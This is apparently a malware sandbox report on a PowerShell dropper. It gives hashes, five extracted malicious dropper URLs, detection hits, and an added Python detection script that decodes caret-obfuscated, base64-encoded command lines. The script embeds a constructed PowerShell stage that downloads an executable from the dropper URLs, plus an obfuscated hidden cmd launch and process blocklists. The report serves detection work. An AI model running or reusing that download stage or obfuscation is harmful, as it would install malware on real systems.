General

  • Target

    6875b798bfba769e6e387e8aabc4664c_JaffaCakes118

  • Size

    127KB

  • Sample

    240522-yvs5wseg77

  • MD5

    6875b798bfba769e6e387e8aabc4664c

  • SHA1

    dfbb786f06af128ab2666e08a9107d689c8d4cd5

  • SHA256

    c8ba54b0b471caa0194f8739d386aff5ebdb3e7213bc8f2d14424c18fcf5608b

  • SHA512

    2f397a950f907348872d5626040a23af17e0a749b2a2badb65be43fa77c430ac2fb10a2b46ef7e3fe943cbf2d53f86398a74db8eca669e452a6425fbd88ccb52

  • SSDEEP

    1536:nptJlmrJpmxlRw99NBc+aS2T+75RnuwACdRR2XGUggBlpF7xpy7RMANuk:pte2dw99fbtRIWwYMKuk

Score
10/10

Malware Config

Extracted

  • Language

    ps1

  • URLs

    Each URL is tagged exe.dropper, i.e. a location the PowerShell stage fetches the next-stage executable from (the script carries several so that it can fall through to the next host if one is down):

    http://hollywoodgossip.biz/GpyDtTIIO1
    http://charpentier-couvreur-gironde.com/2Agu5kOrh7
    http://surprise-dj-team.com/2Atuefrxm
    http://spektramaxima.com/IXx8GGy
    http://dc.amegt.com/wp-content/QNhKWYE

Targets

    • Target

      6875b798bfba769e6e387e8aabc4664c_JaffaCakes118

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • An obfuscated cmd.exe command-line is typically used to evade detection.
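The three signature hits above describe a single chain: an Office parent launching a script host, a caret-obfuscated cmd.exe command line that unwraps to PowerShell, and that PowerShell process then reaching out to one of the extracted dropper URLs. The following is an added example, not code from the sandbox or from the sample, of how a detection engineer would encode those three checks over process-creation and network events. The event records are constructed for the example (Sysmon Event 1 / Event 3 style fields); the dropper URL list is copied from the extracted config above; the Office parent set, script-host set and network blocklist are assumed, and the decoded PowerShell payload is a stand-in, since the real deobfuscated script is not reproduced on this page.

```python
import base64
import re

# IOC list copied from the report's extracted config (exe.dropper URLs).
DROPPER_URLS = {
    "http://hollywoodgossip.biz/GpyDtTIIO1",
    "http://charpentier-couvreur-gironde.com/2Agu5kOrh7",
    "http://surprise-dj-team.com/2Atuefrxm",
    "http://spektramaxima.com/IXx8GGy",
    "http://dc.amegt.com/wp-content/QNhKWYE",
}

# Assumed: document-handling parents that should never spawn a script host.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Assumed blocklist: hosts that have no business opening sockets when launched from a document.
BLOCKLISTED_NET = SCRIPT_HOSTS | {"regsvr32.exe", "rundll32.exe", "certutil.exe"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand; the blob is base64 of UTF-16LE.
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
URL_RE = re.compile(r"https?://[^\s'\";,)`]+")


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def deobfuscate_cmd(cmdline):
    """Undo two cheap cmd.exe-level tricks: caret escapes (^ escapes the next char, so
    p^o^w^e^r^s^h^e^l^l runs as powershell) and empty "" pairs inserted inside tokens."""
    return cmdline.replace('""', "").replace("^", "")


def obfuscation_score(cmdline):
    """Crude score: one point per caret or empty quote pair; env-var substring expansion
    (%x:~3,1%) and an -EncodedCommand blob are strong indicators on their own."""
    score = cmdline.count("^") + cmdline.count('""')
    if re.search(r"%\w+:~-?\d+(,-?\d+)?%", cmdline):
        score += 5
    if ENC_RE.search(cmdline):
        score += 3
    return score


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None when there is none / it is malformed."""
    m = ENC_RE.search(deobfuscate_cmd(cmdline))
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(event):
    """Return the signature names an event triggers, mirroring the report's three hits."""
    hits = []
    image = basename(event["image"])
    if event["type"] == "process_create":
        if basename(event["parent"]) in OFFICE_PARENTS and image in SCRIPT_HOSTS:
            hits.append("process_spawned_unexpected_child")
        if image == "cmd.exe" and obfuscation_score(event["cmdline"]) >= 5:
            hits.append("obfuscated_cmdline")
        decoded = decode_encoded_command(event["cmdline"]) or ""
        if DROPPER_URLS & set(URL_RE.findall(decoded)):
            hits.append("known_dropper_url")
    elif event["type"] == "network_connect" and image in BLOCKLISTED_NET:
        hits.append("blocklisted_process_network_request")
    return hits


# Constructed stand-in for the decoded dropper script (the real one is not on the page):
# iterate the URL list, stop at the first successful download.
PAYLOAD = ("$u='http://hollywoodgossip.biz/GpyDtTIIO1,http://spektramaxima.com/IXx8GGy'.Split(',');"
           "foreach($x in $u){try{(New-Object Net.WebClient).DownloadFile($x,$env:TEMP+'\\a.exe');break}catch{}}")
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()

# Constructed sample events, not taken from the sandbox run.
SAMPLE_EVENTS = [
    {"type": "process_create",
     "parent": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd /c p^o^w^e^r""s^h^e^l^l -w hidden -e ' + ENCODED},
    {"type": "network_connect",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "dest": "hollywoodgossip.biz:80"},
    {"type": "process_create",  # benign control: Explorer running a plain command
     "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c dir"},
]


def scan(events):
    return [(i, evaluate(e)) for i, e in enumerate(events)]


if __name__ == "__main__":
    for i, hits in scan(SAMPLE_EVENTS):
        print(i, hits or "-")
```

The parent/child rule is the one that fires earliest in the chain and is the most robust, because it does not depend on recognising the obfuscation style; the caret and `""` stripping is only there so that the `-EncodedCommand` blob can be found and decoded, which is what lets the analyst match the running command against the extracted URL list instead of waiting for the network event.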

MITRE ATT&CK Enterprise v15